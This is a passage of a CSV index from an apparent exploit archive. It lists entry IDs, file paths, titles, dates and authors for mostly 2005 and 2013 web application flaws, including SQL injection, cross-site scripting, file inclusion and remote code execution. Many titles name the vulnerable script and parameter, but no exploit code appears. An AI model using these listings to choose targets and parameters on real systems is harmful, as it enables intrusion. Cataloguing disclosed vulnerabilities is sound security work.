Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps, -26510,exploits/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps, -26511,exploits/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps, -26512,exploits/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps, -26513,exploits/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps, -26514,exploits/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps, -26515,exploits/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps, -26516,exploits/php/webapps/26516.txt,"Ekinboard 1.0.3 - 'profile.php' Cross-Site Scripting",2005-11-15,trueend5,php,webapps, -26829,exploits/php/webapps/26829.txt,"QuickPayPro 3.1 - 'subscribers.tracking.edit.php?subtrackingid' SQL Injection",2005-12-14,r0t,php,webapps, -26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,php,webapps, -26521,exploits/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps, -27437,exploits/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps, -26527,exploits/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps, -26528,exploits/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps, -26530,exploits/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps, -26532,exploits/jsp/webapps/26532.txt,"Revize CMS - 'Query_results.jsp' SQL Injection",2005-11-17,Lostmon,jsp,webapps, -26533,exploits/jsp/webapps/26533.txt,"Revize CMS - 'Revize.XML' Information Disclosure",2005-11-17,Lostmon,jsp,webapps, -26534,exploits/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps, -26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps, -26537,exploits/asp/webapps/26537.html,"VP-ASP Shopping Cart - 'Shopadmin.asp' HTML Injection",2005-11-17,ConcorDHacK,asp,webapps, -26538,exploits/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - 'options.php?/ viewforum.php' SQL Injection",2005-11-19,"Robin Verton",php,webapps, -26539,exploits/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - 'popup.php' Cross-Site Scripting",2005-11-21,[GB],php,webapps, -26541,exploits/php/webapps/26541.txt,"SimplePoll - 'results.php' SQL Injection",2005-11-21,stranger-killer,php,webapps, -26543,exploits/php/webapps/26543.txt,"APBoard - 'thread.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps, -26544,exploits/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps, -26545,exploits/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps, -26546,exploits/php/webapps/26546.txt,"PHPPost 1.0 - 'profile.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps, -26547,exploits/php/webapps/26547.txt,"PHPPost 1.0 - 'mail.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps, -26549,exploits/php/webapps/26549.txt,"Torrential 1.2 - 'Getdox.php' Directory Traversal",2005-11-22,Shell,php,webapps, -26550,exploits/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function 'User' SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps, -26551,exploits/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple SQL Injections",2005-11-22,"Moritz Naumann",cgi,webapps, -26552,exploits/cgi/webapps/26552.txt,"OTRS 2.0 - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-11-22,"Moritz Naumann",cgi,webapps, -26553,exploits/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps, -26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,php,webapps, -26559,exploits/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps, -26560,exploits/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps, -26561,exploits/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,php,webapps, -26562,exploits/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 - 'subcategory.php?cl' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps, -26563,exploits/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemInfo.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps, -26564,exploits/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemReview.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps, -26565,exploits/php/webapps/26565.txt,"Tunez 1.21 - 'songinfo.php?song_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps, -26566,exploits/php/webapps/26566.txt,"Tunez 1.21 - 'search.php?searchFor' Cross-Site Scripting",2005-11-23,r0t3d3Vil,php,webapps, -26567,exploits/php/webapps/26567.txt,"WSN Forum 1.21 - 'memberlist.php' SQL Injection",2005-11-23,r0t,php,webapps, -26568,exploits/php/webapps/26568.txt,"OmnistarLive 5.2 - Multiple SQL Injections",2005-11-23,r0t,php,webapps, -26569,exploits/php/webapps/26569.txt,"PHP Labs Survey Wizard - SQL Injection",2005-11-23,r0t,php,webapps, -26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,php,webapps, -26571,exploits/php/webapps/26571.txt,"Ezyhelpdesk 1.0 - Multiple SQL Injections",2005-11-23,r0t,php,webapps, -26572,exploits/php/webapps/26572.txt,"blogBuddies 0.3 - 'index.php?u' Cross-Site Scripting",2005-11-23,gb.network,php,webapps, -26573,exploits/php/webapps/26573.txt,"blogBuddies 0.3 - 'magpie_debug.php?url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps, -26574,exploits/php/webapps/26574.txt,"blogBuddies 0.3 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps, -26576,exploits/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injections",2005-11-23,r0t3d3Vil,php,webapps, -26580,exploits/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'search_result.php?cid' SQL Injection",2005-11-24,r0t,php,webapps, -26581,exploits/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'review.php?sbres_id' SQL Injection",2005-11-24,r0t,php,webapps, -26582,exploits/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'browsecats.php?cid' SQL Injection",2005-11-24,r0t,php,webapps, -26583,exploits/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'email.php?h_id' SQL Injection",2005-11-24,r0t,php,webapps, -26584,exploits/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps, -26585,exploits/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps, -26586,exploits/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps, -26587,exploits/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps, -26588,exploits/php/webapps/26588.txt,"Orca Forum 4.3 - 'forum.php' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps, -26589,exploits/php/webapps/26589.txt,"OvBB 0.x - 'thread.php?threadid' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps, -26590,exploits/php/webapps/26590.txt,"OvBB 0.x - 'profile.php?userid' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps, -26591,exploits/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps, -26592,exploits/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps, -26593,exploits/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps, -26594,exploits/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps, -26595,exploits/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,php,webapps, -26596,exploits/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps, -26597,exploits/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps, -26598,exploits/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Inclusion",2005-11-26,[GB],php,webapps, -26599,exploits/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Inclusion",2005-11-26,[GB],php,webapps, -26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],php,webapps, -26602,exploits/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'send.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps, -26603,exploits/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'messages.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps, -26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,php,webapps, -26605,exploits/php/webapps/26605.txt,"Babe Logger 2.0 - 'index.php?gal' SQL Injection",2005-11-28,r0t,php,webapps, -26606,exploits/php/webapps/26606.txt,"Babe Logger 2.0 - 'comments.php?id' SQL Injection",2005-11-28,r0t,php,webapps, -26607,exploits/php/webapps/26607.txt,"Top Music Module 3.0 - SQL Injection",2005-11-28,r0t,php,webapps, -26608,exploits/php/webapps/26608.txt,"phpWordPress 3.0 - Multiple SQL Injections",2005-11-28,r0t,php,webapps, -26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,php,webapps, -26610,exploits/php/webapps/26610.txt,"Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection",2005-11-28,r0t,php,webapps, -26611,exploits/php/webapps/26611.txt,"Bedeng PSP 1.1 - 'index.php?a.nsub' SQL Injection",2005-11-28,r0t,php,webapps, -26612,exploits/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection",2005-11-28,r0t,php,webapps, -26613,exploits/php/webapps/26613.txt,"Softbiz Resource Repository Script - 'details_res.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps, -26614,exploits/php/webapps/26614.txt,"Softbiz Resource Repository Script - 'showcats.php?sbcat_id' SQL Injection",2005-11-28,r0t,php,webapps, -26615,exploits/php/webapps/26615.txt,"Softbiz Resource Repository Script - 'refer_friend.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps, -26616,exploits/php/webapps/26616.txt,"Softbiz Resource Repository Script - 'report_link.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps, -26617,exploits/php/webapps/26617.txt,"BerliOS SourceWell 1.1.3 - SQL Injection",2005-11-28,r0t,php,webapps, -26618,exploits/php/webapps/26618.txt,"AllWeb Search 3.0 - SQL Injection",2005-11-28,r0t,php,webapps, -26619,exploits/php/webapps/26619.txt,"K-Search 1.0 - SQL Injection",2005-11-28,r0t,php,webapps, -26621,exploits/multiple/webapps/26621.txt,"Mobile Atlas Creator 1.9.12 - Persistent Command Injection",2013-07-05,Vulnerability-Lab,multiple,webapps, -26623,exploits/php/webapps/26623.txt,"Kasseler CMS 2 r1223 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps, -26624,exploits/php/webapps/26624.txt,"OpenX 2.8.10 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps, -26625,exploits/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection",2005-11-28,r0t,php,webapps, -26626,exploits/php/webapps/26626.txt,"UGroup 2.6.2 - 'forum.php?FORUM_ID' SQL Injection",2005-11-28,r0t,php,webapps, -26627,exploits/php/webapps/26627.txt,"UGroup 2.6.2 - 'topic.php' Multiple SQL Injections",2005-11-28,r0t,php,webapps, -26628,exploits/php/webapps/26628.txt,"ShockBoard 3.0/4.0 - 'Offset' SQL Injection",2005-11-28,r0t,php,webapps, -26629,exploits/php/webapps/26629.txt,"Netzbrett 1.5.1 - 'P_Entry' SQL Injection",2005-11-28,r0t,php,webapps, -26630,exploits/php/webapps/26630.txt,"ADC2000 NG Pro 1.2 - SQL Injection",2005-11-28,r0t,php,webapps, -26631,exploits/php/webapps/26631.txt,"Simple Document Management System 2.0 - 'list.php?folder_id' SQL Injection",2005-11-28,r0t,php,webapps, -26632,exploits/php/webapps/26632.txt,"Simple Document Management System 2.0 - 'messages.php?mid' SQL Injection",2005-11-28,r0t,php,webapps, -26633,exploits/php/webapps/26633.txt,"PDJK-support Suite 1.1 - Multiple SQL Injections",2005-11-28,r0t,php,webapps, -26634,exploits/php/webapps/26634.txt,"Randshop - Multiple SQL Injections",2005-11-28,liz0,php,webapps, -26635,exploits/php/webapps/26635.txt,"FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-11-28,"Francesco Ongaro",php,webapps, -26636,exploits/php/webapps/26636.txt,"PHP Web Statistik 1.4 - Content Injection",2005-11-28,"Francesco Ongaro",php,webapps, -26637,exploits/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - 'issue.php?id' SQL Injection",2005-11-28,r0t3d3Vil,php,webapps, -26638,exploits/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - 'find.php' Multiple SQL Injections",2005-11-28,r0t3d3Vil,php,webapps, -26639,exploits/php/webapps/26639.txt,"GuppY 4.5 - 'editorTypetool.php?meskin' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps, -26640,exploits/php/webapps/26640.txt,"GuppY 4.5 - 'archbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps, -26641,exploits/php/webapps/26641.txt,"GuppY 4.5 - 'dbbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps, -26642,exploits/php/webapps/26642.txt,"GuppY 4.5 - 'nwlmail.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps, -26643,exploits/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps, -26644,exploits/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 (Multiple Products) - Cross-Site Scripting",2005-11-28,r0t,php,webapps, -26645,exploits/php/webapps/26645.txt,"ASP-Rider 1.6 - 'default.asp' SQL Injection",2005-11-29,info@hoder.com,php,webapps, -26646,exploits/php/webapps/26646.txt,"PHP Upload Center - 'index.php' Directory Traversal",2005-11-29,liz0,php,webapps, -26647,exploits/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection",2005-11-29,r0t3d3Vil,php,webapps, -26649,exploits/php/webapps/26649.txt,"DMANews 0.9 - Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26650,exploits/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26651,exploits/php/webapps/26651.txt,"BosDates 4.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26652,exploits/php/webapps/26652.txt,"Post Affiliate Pro 2.0.4 - 'index.php' SQL Injection",2005-11-29,r0t,php,webapps, -26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,php,webapps, -26654,exploits/php/webapps/26654.txt,"KBase Express 1.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26655,exploits/php/webapps/26655.txt,"ltwCalendar 4.1.3 - 'calendar.php' SQL Injection",2005-11-29,r0t,php,webapps, -26656,exploits/php/webapps/26656.txt,"Orca KnowledgeBase 2.1 - 'KnowledgeBase.php' SQL Injection",2005-11-29,r0t,php,webapps, -26657,exploits/php/webapps/26657.txt,"Orca Blog 1.3 - 'blog.php' SQL Injection",2005-11-29,r0t,php,webapps, -26658,exploits/php/webapps/26658.txt,"Orca Ringmaker 2.3 - 'Ringmaker.php' SQL Injection",2005-11-29,r0t,php,webapps, -26659,exploits/php/webapps/26659.txt,"FAQ System 1.1 - 'viewFAQ.php' Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26660,exploits/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php?category_id' SQL Injection",2005-11-29,r0t,php,webapps, -26661,exploits/php/webapps/26661.txt,"Survey System 1.1 - 'survey.php' SQL Injection",2005-11-29,r0t,php,webapps, -26662,exploits/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,php,webapps, -26663,exploits/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injections",2005-11-29,r0t,php,webapps, -26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps, -26667,exploits/php/webapps/26667.txt,"SocketKB 1.1 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps, -26668,exploits/php/webapps/26668.txt,"PHP Photo Album 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps, -26669,exploits/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'selloffers.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26670,exploits/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'buyoffers.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26671,exploits/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'products.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26672,exploits/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'profiles.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26673,exploits/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - 'index.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26674,exploits/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - 'faq_qanda.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26675,exploits/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - 'refer_friend.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26676,exploits/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - 'print_article.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26677,exploits/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - 'add_comment.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26678,exploits/php/webapps/26678.txt,"FAQRing 3.0 - 'answer.php' SQL Injection",2005-11-30,r0t,php,webapps, -26679,exploits/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - 'index.php' Multiple SQL Injections",2005-11-30,r0t,php,webapps, -26680,exploits/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - 'comments.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26681,exploits/php/webapps/26681.txt,"WSN Knowledge Base 1.2 - 'memberlist.php?id' SQL Injection",2005-11-30,r0t,php,webapps, -26682,exploits/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,php,webapps, -26683,exploits/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 - 'Nikki.php' SQL Injection",2005-11-30,r0t,php,webapps, -26684,exploits/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps, -26685,exploits/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' SQL Injection",2005-11-30,r0t,php,webapps, -26686,exploits/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - 'content.php?cid' SQL Injection",2005-11-30,r0t,php,webapps, -26687,exploits/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injections",2005-12-01,lwang,php,webapps, -26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,php,webapps, -26689,exploits/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - 'Session.php' SQL Injection",2005-12-01,Siegfried,php,webapps, -26691,exploits/php/webapps/26691.txt,"WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting",2005-12-01,lwang,php,webapps, -26692,exploits/php/webapps/26692.txt,"Extreme Corporate 6.0 - 'Extremesearch.php' Cross-Site Scripting",2005-12-01,r0t,php,webapps, -26693,exploits/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection",2005-12-01,"David Maciejak",php,webapps, -26694,exploits/php/webapps/26694.txt,"PHPMyChat 0.14.6 - 'start_page.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps, -26695,exploits/php/webapps/26695.txt,"PHPMyChat 0.14.6 - 'style.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps, -26696,exploits/php/webapps/26696.txt,"PHPMyChat 0.14.6 - 'users_popupL.php?From' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps, -26697,exploits/php/webapps/26697.php,"PHPX 3.5.x - 'Admin 'login.php' SQL Injection",2005-11-30,rgod,php,webapps, -26698,exploits/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'gallery.php?CatID' SQL Injection",2005-12-02,r0t,php,webapps, -26699,exploits/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'ViewItem.php?ItemNum' SQL Injection",2005-12-02,r0t,php,webapps, -26700,exploits/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - search.jsp Cross-Site Scripting",2005-12-02,r0t,jsp,webapps, -26701,exploits/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps, -26702,exploits/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps, -26704,exploits/asp/webapps/26704.txt,"Solupress News 1.0 - 'search.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps, -26705,exploits/asp/webapps/26705.txt,"SiteBeater News 4.0 - 'Archive.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps, -26706,exploits/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - 'messages.php' SQL Injection",2005-12-03,"Nolan West",php,webapps, -26707,exploits/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps, -26713,exploits/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps, -26714,exploits/php/webapps/26714.txt,"PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps, -26715,exploits/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,php,webapps, -26716,exploits/cgi/webapps/26716.txt,"Easy Search System 1.1 - 'search.cgi' Cross-Site Scripting",2005-12-05,r0t,cgi,webapps, -26717,exploits/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'view.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps, -26718,exploits/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps, -26719,exploits/php/webapps/26719.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'viewbrands.php?bid' SQL Injection",2005-12-05,r0t3d3Vil,php,webapps, -26720,exploits/php/webapps/26720.txt,"SAMEDIA LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps, -26721,exploits/cgi/webapps/26721.txt,"1-Script 1-Search 1.8 - '1search.CGI' Cross-Site Scripting",2005-12-05,r0t,cgi,webapps, -26722,exploits/php/webapps/26722.txt,"Hobosworld HobSR - Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps, -26723,exploits/php/webapps/26723.txt,"Relative Real Estate Systems 1.2 - SQL Injection",2005-12-05,r0t3d3Vil,php,webapps, -26724,exploits/php/webapps/26724.txt,"Web4Future eDating Professional 5.0 - 'index.php' Multiple SQL Injections",2005-12-05,r0t,php,webapps, -26725,exploits/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 - 'gift.php?cid' SQL Injection",2005-12-05,r0t,php,webapps, -26726,exploits/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 - 'articles.php?cat' SQL Injection",2005-12-05,r0t,php,webapps, -26727,exploits/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 - 'fq.php?cid' SQL Injection",2005-12-05,r0t,php,webapps, -26728,exploits/php/webapps/26728.txt,"Web4Future Portal Solutions - 'Comentarii.php' SQL Injection",2005-12-05,r0t,php,webapps, -26729,exploits/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - 'functions.php' SQL Injection",2005-12-05,r0t,php,webapps, -26730,exploits/php/webapps/26730.txt,"Web4Future Portal Solutions - 'Arhiva.php' Directory Traversal",2005-12-05,r0t,php,webapps, -26731,exploits/php/webapps/26731.txt,"Blog System 1.2 - 'index.php?cat' SQL Injection",2005-12-05,r0t3d3Vil,php,webapps, -26732,exploits/php/webapps/26732.txt,"Edgewall Software Trac 0.7.1/0.8/0.9 Search Module - SQL Injection",2005-12-05,anonymous,php,webapps, -26734,exploits/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps, -26735,exploits/php/webapps/26735.txt,"vBulletin vBShout Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps, -26736,exploits/hardware/webapps/26736.txt,"Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps, -27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,php,webapps, -26742,exploits/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - 'Password.asp' Cross-Site Scripting",2005-12-06,Dj_Eyes,asp,webapps, -26743,exploits/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - 'KB.asp' Cross-Site Scripting",2005-12-06,r0t,asp,webapps, -26744,exploits/asp/webapps/26744.txt,"NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps, -26745,exploits/asp/webapps/26745.txt,"RWAuction Pro 4.0 - 'search.asp' Cross-Site Scripting",2005-12-06,r0t,asp,webapps, -26746,exploits/asp/webapps/26746.txt,"A-FAQ 1.0 - 'faqDspItem.asp?faqid' SQL Injection",2005-12-06,r0t,asp,webapps, -26747,exploits/asp/webapps/26747.txt,"A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2005-12-06,r0t,asp,webapps, -26748,exploits/php/webapps/26748.txt,"DoceboLms 2.0.x - 'connector.php' Directory Traversal",2005-12-06,rgod,php,webapps, -26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps, -26751,exploits/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps, -26755,exploits/php/webapps/26755.txt,"Thwboard Beta 2.8 - 'calendar.php?year' SQL Injection",2005-12-07,trueend5,php,webapps, -26756,exploits/php/webapps/26756.txt,"Thwboard Beta 2.8 - 'v_profile.php?user' SQL Injection",2005-12-07,trueend5,php,webapps, -26757,exploits/php/webapps/26757.txt,"Thwboard Beta 2.8 - 'misc.php?userid' SQL Injection",2005-12-07,trueend5,php,webapps, 